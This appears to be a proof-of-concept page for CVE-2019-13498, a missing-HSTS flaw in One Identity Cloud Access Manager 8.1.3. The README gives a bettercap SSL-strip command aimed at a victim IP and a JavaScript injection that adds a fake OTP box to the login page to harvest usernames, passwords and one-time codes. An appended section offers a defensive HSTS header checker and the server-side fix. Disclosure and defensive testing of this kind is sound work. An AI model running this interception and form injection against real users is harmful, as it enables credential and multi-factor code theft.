
CVE-2019-13498 PoC — One Identity Cloud Access Manager security feature issue vulnerability

## Associated Vulnerability

Title: One Identity Cloud Access Manager security feature issue vulnerability (CVE-2019-13498)

Description: One Identity Cloud Access Manager (CAM) is a web-based access management solution from the US company One Identity. The product supports single sign-on, multi-factor authentication, access control and auditing. One Identity CAM 8.1.3 contains a security vulnerability caused by the program not using HTTP Strict Transport Security. An attacker can exploit this vulnerability to carry out a man-in-the-middle attack.

Repository description: CVE-2019-13498

## Readme
# CVE-2019-13498

Exploit Title: MITM - Missing HSTS causing credential theft and content manipulation<br>
Date: 07/10/2019<br>
Exploit Author: Furqan Khan<br>
Vendor Homepage: https://www.oneidentity.com/<br>
Software Link: https://www.oneidentity.com/products/cloud-access-manager/<br>
Version: 8.1.3<br>
Tested on: Kali Linux, Windows 7, Ubuntu 16.04<br>

To conduct the MITM attack and steal the username, password and OTP, we make use of bettercap 1.6. Ideally, the OTP box is populated on the second page of the application, after the user successfully authenticates with a legitimate username and password. However, we use SSL strip and content manipulation to inject an OTP text box on the same page where the username and password are prompted. A victim may think this change comes from the application itself, and will share the username, password and OTP and submit the form. The attacker who has set up bettercap and the proxy will get the credentials and OTP, and can use them to log in to the application.


## The bettercap command used

```shell
bettercap -T 192.168.1.103 --proxy -P post --proxy-module injectjs --js-file inject_js.js
```

![bettercap.jpg](https://github.com/FurqanKhan1/CVE-2019-13498/blob/master/1.PNG)

Here 192.168.1.103 is the IP address of the victim. If we do not know it, bettercap can be used to sniff and manipulate the content of the entire LAN (the network shared by attacker and victim).

## The content of inject_js.js

```html
<script>
function replace_payload() {
    // Markup for the extra "OTP" field, reusing the page's own CSS classes
    var append_str = '<div class="wrap-input100 validate-input m-b-20" data-validate="Password"><input class="cui-textbox" type="password" id="passwordTextbox" name="passwordTextbox"><span class="focus-cui-textbox" data-placeholder="OTP"></span></div>';

    // jQuery ($) is assumed to be loaded by the page itself
    var text_div = $(".m-b-20");
    text_div.append(append_str);
}

// Wait two seconds for the page to render before appending the field
function control() { setTimeout(replace_payload, 2000); }
control();
</script>
```
Now, when the victim browses the product (Cloud Access Manager), because of cache poisoning and SSL strip (bettercap), an OTP text box is injected into the page served to the victim via the injected JavaScript snippet.
![injected.jpg](https://github.com/FurqanKhan1/CVE-2019-13498/blob/master/2.PNG)

Given that the connection is downgraded to HTTP via SSL strip, all traffic is now visible to the attacker. Thus we can intercept the traffic and see the username, password and OTP submitted by the victim.

![intercept.jpg](https://github.com/FurqanKhan1/CVE-2019-13498/blob/master/3.PNG)

Bingo! That was easy!
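The downgrade described above only succeeds because the server never sent a Strict-Transport-Security header, which is the defect CVE-2019-13498 records. The following added example, not code from the PoC repository or from One Identity, checks a set of HTTPS response headers for a usable HSTS policy as defined in RFC 6797. The header sets in `SAMPLE_RESPONSES` are constructed, and the one-year minimum `max-age` is the threshold used by the browser preload list rather than anything required by the RFC itself.

```python
"""Check HTTPS response headers for a usable HSTS policy (RFC 6797).

Added example for CVE-2019-13498; not code from the PoC repository or from
One Identity. The header sets in SAMPLE_RESPONSES are constructed.
"""
import re
from typing import Dict, List, Optional

# One year: the minimum max-age the browser preload list accepts (assumption
# taken from hstspreload.org; a shorter value still enables HSTS).
MIN_MAX_AGE = 31536000


def parse_hsts(value: str) -> Optional[Dict[str, Optional[str]]]:
    """Split an STS field value into {directive-name: value-or-None}.

    Directive names are case-insensitive. RFC 6797 section 6.1 requires a
    user agent to ignore the whole header if a directive appears twice, so
    duplicates make this return None.
    """
    directives: Dict[str, Optional[str]] = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, sep, val = part.partition("=")
        name = name.strip().lower()
        if name in directives:
            return None
        # Values may be quoted-strings; strip the quotes for comparison.
        directives[name] = val.strip().strip('"') if sep else None
    return directives


def check_hsts(headers: Dict[str, str], over_tls: bool = True) -> List[str]:
    """Return findings for one response; an empty list means the policy is fine.

    `headers` is a plain mapping of response header names to values, as you
    would get from e.g. requests.get(url).headers.
    """
    findings: List[str] = []
    if not over_tls:
        # Browsers ignore STS received over plain HTTP, so an http:// probe
        # cannot prove anything either way.
        findings.append("probe was not over TLS; HSTS is only honoured on HTTPS responses")
        return findings
    sts = next((v for k, v in headers.items()
                if k.lower() == "strict-transport-security"), None)
    if sts is None:
        findings.append("no Strict-Transport-Security header: a browser will follow "
                        "a downgrade to http:// on later visits")
        return findings
    directives = parse_hsts(sts)
    if directives is None:
        findings.append("duplicate directive in HSTS header: user agents ignore it")
        return findings
    max_age = directives.get("max-age")
    if max_age is None or not re.fullmatch(r"\d+", max_age):
        findings.append("max-age missing or non-numeric: header is ignored")
        return findings
    if int(max_age) == 0:
        findings.append("max-age=0 tells browsers to forget the policy")
    elif int(max_age) < MIN_MAX_AGE:
        findings.append(f"max-age={max_age} is below one year ({MIN_MAX_AGE})")
    if "includesubdomains" not in directives:
        findings.append("includeSubDomains absent: subdomains stay downgradable")
    return findings


# Constructed header sets (not captured from any real server).
SAMPLE_RESPONSES = {
    "no_hsts": {"Content-Type": "text/html; charset=utf-8"},
    "short_lived": {"Strict-Transport-Security": "max-age=300"},
    "hardened": {"strict-transport-security":
                 "max-age=31536000; includeSubDomains; preload"},
}

if __name__ == "__main__":
    for label, hdrs in SAMPLE_RESPONSES.items():
        print(label, "->", check_hsts(hdrs) or ["ok"])
```

A browser only honours HSTS after it has seen the header once over HTTPS, so the very first visit stays exposed unless the domain is on the preload list; the fix for this class of issue is the server sending the header on every HTTPS response, for example `Strict-Transport-Security: max-age=31536000; includeSubDomains`. Feed the function the headers of a real response over TLS to get the same findings for a live deployment.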
## File Snapshot

```text
[4.0K] /data/pocs/578b6f322838933d15353de2ff97e59882680ecc
├── [129K] 1.PNG
├── [ 35K] 2.PNG
├── [148K] 3.PNG
└── [2.6K] README.md

0 directories, 4 files
```